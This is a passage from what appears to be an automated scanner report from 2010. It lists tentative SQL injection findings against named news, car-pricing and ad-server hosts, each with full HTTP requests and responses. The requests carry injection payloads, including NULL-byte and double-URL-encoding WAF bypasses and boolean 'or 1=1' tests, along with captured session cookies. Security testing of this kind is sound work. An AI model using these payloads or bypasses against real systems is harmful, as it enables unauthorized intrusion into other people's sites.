HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:50 GMT Content-Length: 0 Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/214511.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:22:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:22:52 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/214511.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/cvencarpricesecrets%00'/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: metrics.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 00:49:33 GMT Server: Omniture DC/2.0.0 Content-Length: 429 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/cvencarpricesecrets was not found on this serve ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/cvencarpricesecrets%00''/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: metrics.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 00:49:33 GMT Server: Omniture DC/2.0.0 xserver: www608 Content-Length: 0 Content-Type: text/html
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /b%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:06 GMT Server: Omniture DC/2.0.0 Content-Length: 433 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/cvennewscars/1/H.14/ was not found on this s ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b%2527%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:06 GMT Server: Omniture DC/2.0.0 xserver: www609 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/cvennewscars%00'/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:09 GMT Server: Omniture DC/2.0.0 Content-Length: 422 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/cvennewscars was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/cvennewscars%00''/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:09 GMT Server: Omniture DC/2.0.0 xserver: www614 Content-Length: 0 Content-Type: text/html Connection: close
The conTy2 parameter appears to be vulnerable to SQL injection attacks. The payloads 13898589'%20or%201%3d1--%20 and 13898589'%20or%201%3d2--%20 were each submitted in the conTy2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d1--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:23:26 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=cah6oal6ftjvu&t=1291767806;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19343
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d2--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:23:26 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=ftgh8cp6ftjvu&t=1291767806;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19333
(function(){
var multiAdPack = { "encoding":"UTF-8", "version":"1.1", "reqtype":"ac", "ads":[ {"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163h8r1o2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=602f48c4-0261-11e0-b779-0b7c1fdfcc42/B=V.4cA0S0q90-/J=1291767807058589/K=qJHQXaL3_Vc3bVYsBCcV6A/EXP=1291775007/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=602f48c4-0261-11e0-b779-0b7c1fdfcc42&T=19ek3gtk7%2fX%3d1291767807%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2303027397%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI2MDJmNDhjNC0wMjYxLTExZTAtYjc3OS0wYjdjMWZkZmNjNDIiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzgwNjk5MDExNCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d8CA8B444&U=13uqpesp1%2fN%3dV.4cA0S0q90-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|602f48c4-0261-11e0-b779-0b7c1fdfcc42--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac1.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->", "type":"text/html", "id":"0", "size":["130x70"], "slug":false, "secure":false}, {"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aHZ2ZWZocShnaWQkNjAyZjQ4YzQtMDI2MS0xMWUwLWI3NzktMGI3YzFmZGZjYzQyLHN0JDEyOTE3Njc4MDY5OTAxMTQsc2kkMjExMDUxLHYkMS4wLGFpZCRfR3lEQVVTMHFJdy0sY3QkMjUseWJ4JHdnVlpKdFBrUV8yRXN3Li5tZ0kwN0EsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h ...[SNIP]...
1.118. http://open.ad.yieldmanager.net/a1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://open.ad.yieldmanager.net
Path:
/a1
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d1--%20=1 HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:30:25 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=7du40c56ftkd1&t=1291768225;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19302
(function(){
